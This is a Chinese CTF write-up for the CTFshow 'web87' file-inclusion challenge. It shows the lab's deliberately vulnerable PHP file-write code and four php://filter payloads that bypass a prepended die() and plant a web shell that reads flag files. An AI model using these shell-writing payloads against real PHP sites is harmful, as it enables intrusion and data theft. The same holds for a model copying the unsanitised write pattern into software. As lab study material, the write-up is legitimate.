CTFshow-WEB入门-文件包含web87

题目代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}

需要绕过die来写入一句话

方法1:(后面的方法是类似题目的解法)

使用凯撒加密让die字母后移13位变无效(伪协议要2次URL编码,不然会被替换)

php://filter/write=string.rot13/resource=shell.php

Payload:

?file=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%77%72%69%74%65%3d%73%74%72%69%6e%67%2e%72%6f%74%31%33%2f%72%65%73%6f%75%72%63%65%3d%73%68%65%6c%6c%2e%70%68%70

content=<?cuc flfgrz('png s*');?>

方法2:

php://filter/write=convert.base64-decode/resource=shell.php

content=ccPD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==(cc是为了和前面的组合后能正常解码)

方法3:

php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

content=PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==(会先去除标签让die那些消失,然后base64解码)

方法4:

php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=shell.php

content=a?<hp pystsme'(ac t*f)'?; >(两个一组左右换,a是因为die那些是奇数个)

posted @ 2023-01-27 21:48  Hacker&Cat  阅读(105)  评论(0编辑  收藏  举报